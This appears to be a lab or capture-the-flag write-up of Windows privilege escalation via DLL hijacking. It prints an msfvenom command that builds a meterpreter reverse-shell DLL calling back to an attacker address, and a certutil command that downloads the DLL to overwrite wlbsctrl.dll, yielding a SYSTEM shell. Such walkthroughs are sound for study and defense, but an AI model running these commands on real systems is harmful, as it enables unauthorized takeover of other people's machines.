Privilege Escalation

Upon entrance on the system I quickly upgraded my shell using multi/handler and transfered my Privilege Escalation checkers.

I used winPEAS but I didn't come across anything. I transferred PowerUp.ps1 and I came across two ways of getting an administrator shell.

The first path was through an Unquoted Service Path that I was not able to exploit because I did not have write permissions on the folder that I was supposed to use to escalate.

The second path which was through DLL hijacking worked.

We see that there is a writeable dll on the C:\Python\Scripts\ directory.

How do we exploit this? Well this dll fires up everytime the computer starts so if we replace the dll with a malicious reverse shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.49.0 lport=1234 -f dll -o wlbsctrl.dll

Transferred the DLL, and overwriting the existing one.

certutil -urlcache -f http://192.168.49.0:80/wlbsctrl.dll "C:\Python\Scripts\wlbsctrl.dll"

Restarted the computer and fired up my listener and got a reverse shell with nt authority system privileges.